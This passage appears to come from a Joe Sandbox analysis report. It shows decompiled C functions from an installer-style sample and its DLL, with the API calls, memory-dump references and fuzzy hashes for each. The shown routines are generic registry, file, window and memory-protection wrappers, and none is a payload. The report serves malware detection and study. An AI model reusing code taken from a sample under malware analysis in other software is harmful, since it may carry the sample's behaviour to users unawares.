					 *((intOrPtr*)(_t18 - 4)) = 1;
				}
				 *0x4524a8 =  *0x4524a8 +  *((intOrPtr*)(_t18 - 4));
				return 0;
			}








                                                            0x004023a4
                                                            0x004023a4
                                                            0x004023a6
                                                            0x004023aa
                                                            0x004023ad
                                                            0x004023b5
                                                            0x004023b9
                                                            0x004023c2
                                                            0x004023c2
                                                            0x004023c7
                                                            0x004023d0
                                                            0x004023d0
                                                            0x004023dd
                                                            0x004015ae
                                                            0x004015b0
                                                            0x004027c8
                                                            0x004027c8
                                                            0x00402ac8
                                                            0x00402ad4

                                                            APIs
                                                            • WritePrivateProfileStringA.KERNEL32(00000000,00000000,?,00000000), ref: 004023DD
                                                            Memory Dump Source
                                                            • Source File: 00000010.00000002.1283301112.0000000000401000.00000020.00000001.01000000.00000006.sdmp, Offset: 00400000, based on PE: true
                                                            • Associated: 00000010.00000002.1283280375.0000000000400000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                            • Associated: 00000010.00000002.1283325225.0000000000408000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                            • Associated: 00000010.00000002.1283348828.000000000040A000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                            • Associated: 00000010.00000002.1283348828.000000000040C000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                            • Associated: 00000010.00000002.1283348828.0000000000410000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                            • Associated: 00000010.00000002.1283348828.0000000000414000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                            • Associated: 00000010.00000002.1283348828.000000000041E000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                            • Associated: 00000010.00000002.1283348828.000000000042A000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                            • Associated: 00000010.00000002.1283348828.0000000000438000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                            • Associated: 00000010.00000002.1283348828.0000000000448000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                            • Associated: 00000010.00000002.1283348828.000000000045B000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                            • Associated: 00000010.00000002.1283348828.000000000047D000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                            • Associated: 00000010.00000002.1283348828.000000000047F000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                            • Associated: 00000010.00000002.1283348828.00000000004BB000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                            • Associated: 00000010.00000002.1283348828.00000000004F1000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                            • Associated: 00000010.00000002.1283508181.00000000004F7000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_16_2_400000_file.jbxd
                                                            Similarity
                                                            • API ID: PrivateProfileStringWrite
                                                            • String ID:
                                                            • API String ID: 390214022-0
                                                            • Opcode ID: f7546b57c2d88294b794a0ce81ec9b16f8aeca243a3d815bd59fa4cac4068163
                                                            • Instruction ID: f0bce9e42b5e283f9075ac1063ffb1f66a35e0649843f6992b50a90661d40e1e
                                                            • Opcode Fuzzy Hash: f7546b57c2d88294b794a0ce81ec9b16f8aeca243a3d815bd59fa4cac4068163
                                                            • Instruction Fuzzy Hash: 8BE04831604128ABE7203EF21F8D97F10989B84304B64053FBA01B61C2D9FD4C4242A9
                                                            Uniqueness

                                                            Uniqueness Score: -1.00%

                                                            Function 0040610B Relevance: 1.5, APIs: 1, Instructions: 24registryCOMMON
                                                            Download Yara Rule
                                                            C-Code - Quality: 100%
                                                            			E0040610B(void* __eflags, intOrPtr _a4, char* _a8, int _a12, void** _a16) {
				void* _t7;
				long _t8;
				void* _t9;

				_t7 = E0040605C(_a4,  &_a12);
				if(_t7 != 0) {
					_t8 = RegCreateKeyExA(_t7, _a8, 0, 0, 0, _a12, 0, _a16, 0); // executed
					return _t8;
				}
				_t9 = 6;
				return _t9;
			}






                                                            0x00406115
                                                            0x0040611e
                                                            0x00406134
                                                            0x00000000
                                                            0x00406134
                                                            0x00406122
                                                            0x00000000

                                                            APIs
                                                            • RegCreateKeyExA.KERNEL32(00000000,?,00000000,00000000,00000000,?,00000000,?,00000000), ref: 00406134
                                                            Memory Dump Source
                                                            • Source File: 00000010.00000002.1283301112.0000000000401000.00000020.00000001.01000000.00000006.sdmp, Offset: 00400000, based on PE: true
                                                            • Associated: 00000010.00000002.1283280375.0000000000400000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                            • Associated: 00000010.00000002.1283325225.0000000000408000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                            • Associated: 00000010.00000002.1283348828.000000000040A000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                            • Associated: 00000010.00000002.1283348828.000000000040C000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                            • Associated: 00000010.00000002.1283348828.0000000000410000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                            • Associated: 00000010.00000002.1283348828.0000000000414000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                            • Associated: 00000010.00000002.1283348828.000000000041E000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                            • Associated: 00000010.00000002.1283348828.000000000042A000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                            • Associated: 00000010.00000002.1283348828.0000000000438000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                            • Associated: 00000010.00000002.1283348828.0000000000448000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                            • Associated: 00000010.00000002.1283348828.000000000045B000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                            • Associated: 00000010.00000002.1283348828.000000000047D000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                            • Associated: 00000010.00000002.1283348828.000000000047F000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                            • Associated: 00000010.00000002.1283348828.00000000004BB000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                            • Associated: 00000010.00000002.1283348828.00000000004F1000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                            • Associated: 00000010.00000002.1283508181.00000000004F7000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_16_2_400000_file.jbxd
                                                            Similarity
                                                            • API ID: Create
                                                            • String ID:
                                                            • API String ID: 2289755597-0
                                                            • Opcode ID: f0170b29b94a961cdf0cc122a920c286c7e5b726b195fdee8f598fb45efbb6e4
                                                            • Instruction ID: f3dc4abaab06895e066b0b710936ca54da7b1f8b7a25aa4512e4b4def2a222e8
                                                            • Opcode Fuzzy Hash: f0170b29b94a961cdf0cc122a920c286c7e5b726b195fdee8f598fb45efbb6e4
                                                            • Instruction Fuzzy Hash: BAE0E672110209BEEF195F50DC0AD7B371DEB14314F01452EF947D4091E6B5A9305634
                                                            Uniqueness

                                                            Uniqueness Score: -1.00%

                                                            Function 00405E62 Relevance: 1.5, APIs: 1, Instructions: 22fileCOMMON
                                                            Download Yara Rule
                                                            C-Code - Quality: 100%
                                                            			E00405E62(void* _a4, void* _a8, long _a12) {
				int _t7;
				long _t11;

				_t11 = _a12;
				_t7 = ReadFile(_a4, _a8, _t11,  &_a12, 0); // executed
				if(_t7 == 0 || _t11 != _a12) {
					return 0;
				} else {
					return 1;
				}
			}





                                                            0x00405e66
                                                            0x00405e76
                                                            0x00405e7e
                                                            0x00000000
                                                            0x00405e85
                                                            0x00000000
                                                            0x00405e87

                                                            APIs
                                                            • ReadFile.KERNELBASE(00000000,00000000,00000004,00000004,00000000), ref: 00405E76
                                                            Memory Dump Source
                                                            • Source File: 00000010.00000002.1283301112.0000000000401000.00000020.00000001.01000000.00000006.sdmp, Offset: 00400000, based on PE: true
                                                            • Associated: 00000010.00000002.1283280375.0000000000400000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                            • Associated: 00000010.00000002.1283325225.0000000000408000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                            • Associated: 00000010.00000002.1283348828.000000000040A000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                            • Associated: 00000010.00000002.1283348828.000000000040C000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                            • Associated: 00000010.00000002.1283348828.0000000000410000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                            • Associated: 00000010.00000002.1283348828.0000000000414000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                            • Associated: 00000010.00000002.1283348828.000000000041E000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                            • Associated: 00000010.00000002.1283348828.000000000042A000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                            • Associated: 00000010.00000002.1283348828.0000000000438000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                            • Associated: 00000010.00000002.1283348828.0000000000448000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                            • Associated: 00000010.00000002.1283348828.000000000045B000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                            • Associated: 00000010.00000002.1283348828.000000000047D000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                            • Associated: 00000010.00000002.1283348828.000000000047F000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                            • Associated: 00000010.00000002.1283348828.00000000004BB000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                            • Associated: 00000010.00000002.1283348828.00000000004F1000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                            • Associated: 00000010.00000002.1283508181.00000000004F7000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_16_2_400000_file.jbxd
                                                            Similarity
                                                            • API ID: FileRead
                                                            • String ID:
                                                            • API String ID: 2738559852-0
                                                            • Opcode ID: da94c88c01f32db49c143d41d40f73f2c481f3bafd85dc9fd8b917d4e0158b31
                                                            • Instruction ID: d159feaa40f66387c232a0365126d803d89e879c5a9a8176c13ce5bb2f202f1c
                                                            • Opcode Fuzzy Hash: da94c88c01f32db49c143d41d40f73f2c481f3bafd85dc9fd8b917d4e0158b31
                                                            • Instruction Fuzzy Hash: CFE0B63221025AAFDF109F95DC00AAB7B6CEB05260F144437FD99E6150D671E961DAE4
                                                            Uniqueness

                                                            Uniqueness Score: -1.00%

                                                            Function 00405E91 Relevance: 1.5, APIs: 1, Instructions: 22fileCOMMON
                                                            Download Yara Rule
                                                            C-Code - Quality: 100%
                                                            			E00405E91(void* _a4, void* _a8, long _a12) {
				int _t7;
				long _t11;

				_t11 = _a12;
				_t7 = WriteFile(_a4, _a8, _t11,  &_a12, 0); // executed
				if(_t7 == 0 || _t11 != _a12) {
					return 0;
				} else {
					return 1;
				}
			}





                                                            0x00405e95
                                                            0x00405ea5
                                                            0x00405ead
                                                            0x00000000
                                                            0x00405eb4
                                                            0x00000000
                                                            0x00405eb6

                                                            APIs
                                                            • WriteFile.KERNELBASE(00000000,00000000,00000004,00000004,00000000), ref: 00405EA5
                                                            Memory Dump Source
                                                            • Source File: 00000010.00000002.1283301112.0000000000401000.00000020.00000001.01000000.00000006.sdmp, Offset: 00400000, based on PE: true
                                                            • Associated: 00000010.00000002.1283280375.0000000000400000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                            • Associated: 00000010.00000002.1283325225.0000000000408000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                            • Associated: 00000010.00000002.1283348828.000000000040A000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                            • Associated: 00000010.00000002.1283348828.000000000040C000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                            • Associated: 00000010.00000002.1283348828.0000000000410000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                            • Associated: 00000010.00000002.1283348828.0000000000414000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                            • Associated: 00000010.00000002.1283348828.000000000041E000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                            • Associated: 00000010.00000002.1283348828.000000000042A000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                            • Associated: 00000010.00000002.1283348828.0000000000438000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                            • Associated: 00000010.00000002.1283348828.0000000000448000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                            • Associated: 00000010.00000002.1283348828.000000000045B000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                            • Associated: 00000010.00000002.1283348828.000000000047D000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                            • Associated: 00000010.00000002.1283348828.000000000047F000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                            • Associated: 00000010.00000002.1283348828.00000000004BB000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                            • Associated: 00000010.00000002.1283348828.00000000004F1000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                            • Associated: 00000010.00000002.1283508181.00000000004F7000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_16_2_400000_file.jbxd
                                                            Similarity
                                                            • API ID: FileWrite
                                                            • String ID:
                                                            • API String ID: 3934441357-0
                                                            • Opcode ID: 3dec9289c2e50997f5b7f42c7d661c3d3292bfbb80aff78175bf8fde073ef60e
                                                            • Instruction ID: f6dbd1b2bb29cf3778f9da1b12eb4ab865b2d476cff05d6c6da3e568d4bed244
                                                            • Opcode Fuzzy Hash: 3dec9289c2e50997f5b7f42c7d661c3d3292bfbb80aff78175bf8fde073ef60e
                                                            • Instruction Fuzzy Hash: CEE0EC3221165AABEF119F65DC00AEB7B6CEB05361F004836FA95E3150D631E9219BE4
                                                            Uniqueness

                                                            Uniqueness Score: -1.00%

                                                            Function 73C319C7 Relevance: 1.5, APIs: 1, Instructions: 21memoryCOMMON
                                                            Download Yara Rule
                                                            C-Code - Quality: 100%
                                                            			_entry_(intOrPtr _a4, intOrPtr _a8) {

				 *0x73c35014 = _a4;
				if(_a8 == 1) {
					VirtualProtect(0x73c3501c, 4, 0x40, 0x73c35034); // executed
					 *0x73c3501c = 0xc2;
					 *0x73c35034 = 0;
					 *0x73c35030 = 0;
					 *0x73c3502c = 0;
					 *0x73c35028 = 0;
					 *0x73c35024 = 0;
					 *0x73c35020 = 0;
					 *0x73c3501e = 0;
				}
				return 1;
			}



                                                            0x73c319d0
                                                            0x73c319d5
                                                            0x73c319e5
                                                            0x73c319ed
                                                            0x73c319f4
                                                            0x73c319fa
                                                            0x73c31a00
                                                            0x73c31a06
                                                            0x73c31a0c
                                                            0x73c31a12
                                                            0x73c31a18
                                                            0x73c31a18
                                                            0x73c31a21

                                                            APIs
                                                            • VirtualProtect.KERNELBASE(73C3501C,00000004,00000040,73C35034), ref: 73C319E5
                                                            Memory Dump Source
                                                            • Source File: 00000010.00000002.1284018983.0000000073C31000.00000020.00000001.01000000.00000008.sdmp, Offset: 73C30000, based on PE: true
                                                            • Associated: 00000010.00000002.1284008674.0000000073C30000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                            • Associated: 00000010.00000002.1284039391.0000000073C34000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                            • Associated: 00000010.00000002.1284051137.0000000073C36000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_16_2_73c30000_file.jbxd
                                                            Similarity
                                                            • API ID: ProtectVirtual
                                                            • String ID:
                                                            • API String ID: 544645111-0
                                                            • Opcode ID: cf80e85d301138b1742db06ccd89520eaf9e6cc34ae476591a41a4fb4d9fecb8
                                                            • Instruction ID: 59a7b0ca4237653c92c73305a6537c36e4901d12660a3aa831db0e1fe2509fa4
                                                            • Opcode Fuzzy Hash: cf80e85d301138b1742db06ccd89520eaf9e6cc34ae476591a41a4fb4d9fecb8
                                                            • Instruction Fuzzy Hash: B5F0ACF6A19380DAC318EF1A95457853EE0B719355F60452EF79EDA341C33289009FDB
                                                            Uniqueness

                                                            Uniqueness Score: -1.00%

                                                            Function 004060DD Relevance: 1.5, APIs: 1, Instructions: 19registryCOMMON
                                                            Download Yara Rule
                                                            C-Code - Quality: 100%
                                                            			E004060DD(void* __eflags, intOrPtr _a4, char* _a8, int _a12, void** _a16) {
				void* _t7;
				long _t8;
				void* _t9;

				_t7 = E0040605C(_a4,  &_a12);
				if(_t7 != 0) {
					_t8 = RegOpenKeyExA(_t7, _a8, 0, _a12, _a16); // executed
					return _t8;
				}
				_t9 = 6;
				return _t9;
			}






                                                            0x004060e7
                                                            0x004060ee
                                                            0x00406101
                                                            0x00000000
                                                            0x00406101
                                                            0x004060f2
                                                            0x00000000

                                                            APIs
                                                            • RegOpenKeyExA.KERNEL32(00000000,?,00000000,?,?), ref: 00406101
                                                            Memory Dump Source
                                                            • Source File: 00000010.00000002.1283301112.0000000000401000.00000020.00000001.01000000.00000006.sdmp, Offset: 00400000, based on PE: true
                                                            • Associated: 00000010.00000002.1283280375.0000000000400000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                            • Associated: 00000010.00000002.1283325225.0000000000408000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                            • Associated: 00000010.00000002.1283348828.000000000040A000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                            • Associated: 00000010.00000002.1283348828.000000000040C000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                            • Associated: 00000010.00000002.1283348828.0000000000410000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                            • Associated: 00000010.00000002.1283348828.0000000000414000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                            • Associated: 00000010.00000002.1283348828.000000000041E000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                            • Associated: 00000010.00000002.1283348828.000000000042A000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                            • Associated: 00000010.00000002.1283348828.0000000000438000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                            • Associated: 00000010.00000002.1283348828.0000000000448000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                            • Associated: 00000010.00000002.1283348828.000000000045B000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                            • Associated: 00000010.00000002.1283348828.000000000047D000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                            • Associated: 00000010.00000002.1283348828.000000000047F000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                            • Associated: 00000010.00000002.1283348828.00000000004BB000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                            • Associated: 00000010.00000002.1283348828.00000000004F1000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                            • Associated: 00000010.00000002.1283508181.00000000004F7000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_16_2_400000_file.jbxd
                                                            Similarity
                                                            • API ID: Open
                                                            • String ID:
                                                            • API String ID: 71445658-0
                                                            • Opcode ID: 759d75b29ffd137612e455953a298f0698f5beae901813cd77d6ec234b014f3e
                                                            • Instruction ID: acfb9daac442d6471bee54970dc50a73ebaac4160da87f0822be439bec8b4f66
                                                            • Opcode Fuzzy Hash: 759d75b29ffd137612e455953a298f0698f5beae901813cd77d6ec234b014f3e
                                                            • Instruction Fuzzy Hash: 01D0123204020DFBEF119F90DD05FAB3B1DAB08310F014426FE06A4091D776D530A724
                                                            Uniqueness

                                                            Uniqueness Score: -1.00%

                                                            Function 0040159D Relevance: 1.5, APIs: 1, Instructions: 18COMMON
                                                            Download Yara Rule
                                                            C-Code - Quality: 100%
                                                            			E0040159D() {
				int _t5;
				void* _t11;
				int _t14;

				_t5 = SetFileAttributesA(E00402C39(0xfffffff0),  *(_t11 - 0x24)); // executed
				_t14 = _t5;
				if(_t14 == 0) {
					 *((intOrPtr*)(_t11 - 4)) = 1;
				}
				 *0x4524a8 =  *0x4524a8 +  *((intOrPtr*)(_t11 - 4));
				return 0;
			}






                                                            0x004015a8
                                                            0x004015ae
                                                            0x004015b0
                                                            0x004027c8
                                                            0x004027c8
                                                            0x00402ac8
                                                            0x00402ad4

                                                            APIs
                                                            • SetFileAttributesA.KERNELBASE(00000000,?,000000F0), ref: 004015A8
                                                            Memory Dump Source
                                                            • Source File: 00000010.00000002.1283301112.0000000000401000.00000020.00000001.01000000.00000006.sdmp, Offset: 00400000, based on PE: true
                                                            • Associated: 00000010.00000002.1283280375.0000000000400000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                            • Associated: 00000010.00000002.1283325225.0000000000408000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                            • Associated: 00000010.00000002.1283348828.000000000040A000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                            • Associated: 00000010.00000002.1283348828.000000000040C000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                            • Associated: 00000010.00000002.1283348828.0000000000410000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                            • Associated: 00000010.00000002.1283348828.0000000000414000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                            • Associated: 00000010.00000002.1283348828.000000000041E000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                            • Associated: 00000010.00000002.1283348828.000000000042A000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                            • Associated: 00000010.00000002.1283348828.0000000000438000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                            • Associated: 00000010.00000002.1283348828.0000000000448000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                            • Associated: 00000010.00000002.1283348828.000000000045B000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                            • Associated: 00000010.00000002.1283348828.000000000047D000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                            • Associated: 00000010.00000002.1283348828.000000000047F000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                            • Associated: 00000010.00000002.1283348828.00000000004BB000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                            • Associated: 00000010.00000002.1283348828.00000000004F1000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                            • Associated: 00000010.00000002.1283508181.00000000004F7000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_16_2_400000_file.jbxd
                                                            Similarity
                                                            • API ID: AttributesFile
                                                            • String ID:
                                                            • API String ID: 3188754299-0
                                                            • Opcode ID: 4c6f9109c7df2b6538a7cf6a4021bb015a1706267f02f3e3fda4f3a54644e72c
                                                            • Instruction ID: e4c96a1e4e3d7fafacf821d9605d951cf466c31607fdae1070ddd011c57cfc7f
                                                            • Opcode Fuzzy Hash: 4c6f9109c7df2b6538a7cf6a4021bb015a1706267f02f3e3fda4f3a54644e72c
                                                            • Instruction Fuzzy Hash: 4DD01232B14104DBDB10DFA5AB0899E73A4DB55325B308577E101F21D1D6B9D9409B3D
                                                            Uniqueness

                                                            Uniqueness Score: -1.00%

                                                            Function 004042D4 Relevance: 1.5, APIs: 1, Instructions: 10COMMON
                                                            Download Yara Rule
                                                            C-Code - Quality: 100%
                                                            			E004042D4(intOrPtr _a12) {
				intOrPtr _v0;
				struct HWND__* _v4;
				int _t7;
				void* _t8;
				void* _t9;
				void* _t10;

				_t7 = SetDlgItemTextA(_v4, _v0 + 0x3e8, E004062EA(_t8, _t9, _t10, 0, _a12)); // executed
				return _t7;
			}









                                                            0x004042ee
                                                            0x004042f3

                                                            APIs
                                                            • SetDlgItemTextA.USER32(?,?,00000000), ref: 004042EE
                                                            Memory Dump Source
                                                            • Source File: 00000010.00000002.1283301112.0000000000401000.00000020.00000001.01000000.00000006.sdmp, Offset: 00400000, based on PE: true
                                                            • Associated: 00000010.00000002.1283280375.0000000000400000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                            • Associated: 00000010.00000002.1283325225.0000000000408000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                            • Associated: 00000010.00000002.1283348828.000000000040A000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                            • Associated: 00000010.00000002.1283348828.000000000040C000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                            • Associated: 00000010.00000002.1283348828.0000000000410000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                            • Associated: 00000010.00000002.1283348828.0000000000414000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                            • Associated: 00000010.00000002.1283348828.000000000041E000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                            • Associated: 00000010.00000002.1283348828.000000000042A000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                            • Associated: 00000010.00000002.1283348828.0000000000438000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                            • Associated: 00000010.00000002.1283348828.0000000000448000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                            • Associated: 00000010.00000002.1283348828.000000000045B000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                            • Associated: 00000010.00000002.1283348828.000000000047D000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                            • Associated: 00000010.00000002.1283348828.000000000047F000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                            • Associated: 00000010.00000002.1283348828.00000000004BB000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                            • Associated: 00000010.00000002.1283348828.00000000004F1000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                            • Associated: 00000010.00000002.1283508181.00000000004F7000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_16_2_400000_file.jbxd
                                                            Similarity
                                                            • API ID: ItemText
                                                            • String ID:
                                                            • API String ID: 3367045223-0
                                                            • Opcode ID: a7ccc5f13d7a9dd03b49f03cec007a1df0ae89502798fe29fb091b2ebe8b6ea7
                                                            • Instruction ID: 22e3c99022c4b401909cfeccc5f53fcf3645d9aba18eb3be6cde127aefdf9dc7
                                                            • Opcode Fuzzy Hash: a7ccc5f13d7a9dd03b49f03cec007a1df0ae89502798fe29fb091b2ebe8b6ea7
                                                            • Instruction Fuzzy Hash: 26C04C75548200BFD641B755CC42F1FB799EFA432AF00C52EB15DA11D1C635C8209A2A
                                                            Uniqueness

                                                            Uniqueness Score: -1.00%

                                                            Function 00404320 Relevance: 1.5, APIs: 1, Instructions: 9windowCOMMON
                                                            Download Yara Rule
                                                            C-Code - Quality: 100%
                                                            			E00404320(int _a4) {
				struct HWND__* _t2;
				long _t3;

				_t2 =  *0x44e3f8;
				if(_t2 != 0) {
					_t3 = SendMessageA(_t2, _a4, 0, 0); // executed
					return _t3;
				}
				return _t2;
			}





                                                            0x00404320
                                                            0x00404327
                                                            0x00404332
                                                            0x00000000
                                                            0x00404332
                                                            0x00404338

                                                            APIs
                                                            Memory Dump Source
                                                            • Source File: 00000010.00000002.1283301112.0000000000401000.00000020.00000001.01000000.00000006.sdmp, Offset: 00400000, based on PE: true
                                                            • Associated: 00000010.00000002.1283280375.0000000000400000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                            • Associated: 00000010.00000002.1283325225.0000000000408000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                            • Associated: 00000010.00000002.1283348828.000000000040A000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                            • Associated: 00000010.00000002.1283348828.000000000040C000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                            • Associated: 00000010.00000002.1283348828.0000000000410000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                            • Associated: 00000010.00000002.1283348828.0000000000414000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                            • Associated: 00000010.00000002.1283348828.000000000041E000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                            • Associated: 00000010.00000002.1283348828.000000000042A000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                            • Associated: 00000010.00000002.1283348828.0000000000438000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                            • Associated: 00000010.00000002.1283348828.0000000000448000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                            • Associated: 00000010.00000002.1283348828.000000000045B000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                            • Associated: 00000010.00000002.1283348828.000000000047D000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                            • Associated: 00000010.00000002.1283348828.000000000047F000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                            • Associated: 00000010.00000002.1283348828.00000000004BB000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                            • Associated: 00000010.00000002.1283348828.00000000004F1000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                            • Associated: 00000010.00000002.1283508181.00000000004F7000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_16_2_400000_file.jbxd
                                                            Similarity
                                                            • API ID: MessageSend
                                                            • String ID:
                                                            • API String ID: 3850602802-0
                                                            • Opcode ID: f50e63b132b24878aef5dc53f281ae586e67706c8815a59119a5f52f37cdf5c1
                                                            • Instruction ID: f33369c0959fc2f31fb2d94020f8cc99ded583a01a7fd26deb419bde1f84e5de
                                                            • Opcode Fuzzy Hash: f50e63b132b24878aef5dc53f281ae586e67706c8815a59119a5f52f37cdf5c1
                                                            • Instruction Fuzzy Hash: 52C09B757447017FEA159F619D45F077798B760B01F1544397750F70D0C674D410D61C
                                                            Uniqueness

                                                            Uniqueness Score: -1.00%

                                                            Function 0040336B Relevance: 1.5, APIs: 1, Instructions: 6COMMON
                                                            Download Yara Rule
                                                            C-Code - Quality: 100%
                                                            			E0040336B(long _a4) {
				long _t2;

				_t2 = SetFilePointer( *0x40a018, _a4, 0, 0); // executed
				return _t2;
			}




                                                            0x00403379
                                                            0x0040337f

                                                            APIs
                                                            • SetFilePointer.KERNELBASE(00000000,00000000,00000000,004030D1,?,?,?,004036FD,?,?,00000007,00000009,0000000B), ref: 00403379
                                                            Memory Dump Source
                                                            • Source File: 00000010.00000002.1283301112.0000000000401000.00000020.00000001.01000000.00000006.sdmp, Offset: 00400000, based on PE: true
                                                            • Associated: 00000010.00000002.1283280375.0000000000400000.00000002.00000001.01000000.00000006.sdmpDownload File
